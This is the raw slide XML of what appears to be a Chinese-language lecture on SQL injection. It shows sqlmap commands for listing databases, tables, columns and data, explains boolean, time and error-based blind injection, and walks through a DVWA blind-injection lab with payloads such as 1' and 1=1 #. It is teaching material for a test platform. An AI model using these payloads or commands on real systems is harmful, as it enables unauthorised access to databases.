            <a:off x="3719736" y="2708188"/>
            <a:ext cx="1872208" cy="292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EF170DF-5408-764A-9E86-361241A55144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="841797" y="3233798"/>
            <a:ext cx="10513814" cy="441852"/>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越权列举数据库表的信息：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D84DDF9B-DA68-320F-0015-159686C29275}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="846328" y="3880633"/>
            <a:ext cx="10497658" cy="1813549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F0CC60A-79CC-C669-612C-3EAB84463419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839093" y="4559127"/>
            <a:ext cx="1584499" cy="1063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705D61B5-AFA0-59F1-871E-425B884C1A78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820305" y="1113280"/>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第五步：利用注入点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411295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01</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117027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1EC5BB6-943A-86A2-2798-DF0463C0D420}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="5124"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="3573016"/>
            <a:ext cx="10369152" cy="2666606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61C56D48-297F-A09D-350B-255ACF822A4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="2069590"/>
            <a:ext cx="10369152" cy="999370"/>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16008" y="1576370"/>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还可以列举数据库表中列的信息：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DE14CB-4B12-2E29-A110-F6147BE45441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3719736" y="2644436"/>
            <a:ext cx="2880320" cy="292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EF170DF-5408-764A-9E86-361241A55144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="842237" y="3077798"/>
            <a:ext cx="10513814" cy="441852"/>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越权列举数据库表中列的信息：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F0CC60A-79CC-C669-612C-3EAB84463419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="4295406"/>
            <a:ext cx="3096344" cy="19442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C3CCB792-4E24-64CD-BCDE-86F3D4692412}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820305" y="1113280"/>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第五步：利用注入点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3842814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5C49B08-F019-66BF-C7F7-67ACDB2943E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="3467426"/>
            <a:ext cx="10441482" cy="2841894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9932BD7-A72A-CA80-88C1-DB4F1F6AFFB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="897488" y="2037691"/>
            <a:ext cx="10474883" cy="887253"/>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20305" y="1532238"/>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还可以列举数据库表中数据的信息：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DE14CB-4B12-2E29-A110-F6147BE45441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3739201" y="2549902"/>
            <a:ext cx="2880320" cy="292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EF170DF-5408-764A-9E86-361241A55144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="863666" y="2910539"/>
            <a:ext cx="10513814" cy="441852"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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SQLMap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越权列举数据库表中数据的信息：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F0CC60A-79CC-C669-612C-3EAB84463419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="4797152"/>
            <a:ext cx="10441482" cy="14401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66B86C5-CDB9-869D-65C0-36BDC9C0CF97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820305" y="1113280"/>
            <a:ext cx="295465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第五步：利用注入点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7571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5EECFC2-8C32-974B-2FEB-8BFF4089428D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="635001"/>
            <a:ext cx="9753600" cy="1209824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square"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sqlmap</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-u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url</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--tables -D   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea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testdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea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语句的作用是</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A15E0988-79BA-5C8B-7A01-86970D14C293}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="191683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检查</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url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是否存在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注入点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13CDC85D-AD4E-FB04-4E6F-360E3AD58417}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="277408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注入列举所有的数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70CD8BEA-452D-4ACE-8759-BA296EDA3620}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="363133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注入列举数据库</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testdb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的所有表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC6CEDD6-A2C1-BEAF-6EDC-5A94D6A49209}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="448858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注入列举所有数据库和所有表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="椭圆 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD30DAF8-C722-2BB9-6A86-31C4CA6D55F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="198112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D264CFB8-F7B9-3B6C-9E83-F026461D8C07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="283837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AF937FDA-5A54-1F64-1D20-E1E83FDDCDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="369562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ABC628D4-8B43-7422-E128-ECD5170522E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="455287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61437033-ACCF-C14D-63D2-F7FD699DF92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B425DBA9-3D5F-A27F-7C44-9E65A62D8F66}"/>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01293D45-0C98-E8EF-FF04-6E4E1B89962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13023E4C-367A-3B45-12F8-6F8EA4BE224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C796B9F5-5158-1E4F-90D6-D0D0590B8CA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682A2A7D-6BB4-CC06-EC51-7906FEBE664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82F5A206-758C-FDB2-9FC2-405341E5FD04}"/>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5314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6" y="1148445"/>
            <a:ext cx="1386918"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盲注</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706792"/>
            <a:ext cx="4968552" cy="390440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上面的实验已经证明了</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注入的危害性，通过工具</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SQLM</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可以轻松获取数据库的所有表、列和数据。</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有一些</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注入可以将</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执行的结果回显，这种情况下，可以直接通过回显的结果来显示想要查询的各类信息。</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但是在实际情况中，具有回显的注入点非常罕见。因此就需要利用</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盲注。</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384032" y="1706792"/>
            <a:ext cx="4968551" cy="3904402"/>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盲注是通过不能直接显示的途径来获取数据库数据的方法。在盲注中，攻击者根据其返回页面的不同来判断信息（可能是页面内容的不同，也可以是响应时间不同）。</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一般情况下，盲注可分为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类：</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基于布尔的</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盲注</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基于时间的</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盲注</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基于报错的</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盲注</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{851F1501-6F21-9504-E57E-F35A560FDBE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="1155219"/>
            <a:ext cx="2002471"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盲注分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1351503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6" y="1155220"/>
            <a:ext cx="2925801"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基于布尔的</a:t>
            </a:r>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盲注</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706792"/>
            <a:ext cx="4968552" cy="390440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对于一个注入点，页面只返回</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True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False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两种类型页面，此时可以利用基于布尔的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盲注。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基于布尔的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盲注就是通过判断语句来猜解，如果判断条件正确则页面显示正常，否则报错。这样一轮一轮地猜下去，直到猜对，是一种比较麻烦但是相对简单的盲注方式。</a:t>
            </a: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384032" y="1657548"/>
            <a:ext cx="4968552" cy="390440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本实验通过</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中提供的注入案例进行手工盲注，目标是推测出数据库、表和字段。</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手工盲注的过程，就像与一个机器人聊天，这个机器人知道的很多，但只会回答“是”或者“不是”，因此你需要询问它这样的问题，例如“数据库名字的第一个字母是不是</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啊？”，通过这种机械的询问，最终获得想要的数据。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{851F1501-6F21-9504-E57E-F35A560FDBE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450969" y="1155219"/>
            <a:ext cx="3493264" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基于布尔的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>手工盲注实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4066722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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>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706375"/>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测试平台选择</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盲注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 Injection(Blind)</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，显示相应用户存在：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FB28FCC-0868-3E20-DD62-C3269A49D0A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919536" y="2382684"/>
            <a:ext cx="8509000" cy="2628900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D6FFEC1-E512-529F-9E15-788B3B2F54DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1155220"/>
            <a:ext cx="7571303"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第一步：判断是否存在注入，注入是字符型还是数字型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1633918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44490" y="1686004"/>
            <a:ext cx="10513814" cy="826573"/>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输入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1' </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>and 1=1 #</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="e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单引号为了闭合原来</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语句中的第一个单引号，而后面的</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为了闭合后面的单引号。运行后，显示存在：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAEFBC0C-455E-5330-4C2F-4F4483F1E356}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841500" y="2614946"/>
            <a:ext cx="8509000" cy="2628900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5EC07E0-1CEF-1E75-E80D-B320F6E2AB26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1155220"/>
            <a:ext cx="7571303"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第一步：判断是否存在注入，注入是字符型还是数字型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149200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719592"/>
            <a:ext cx="10513814" cy="441852"/>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输入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1' </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>and 1=2 #</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="e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显示不存在，说明存在字符型的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en"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盲注。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
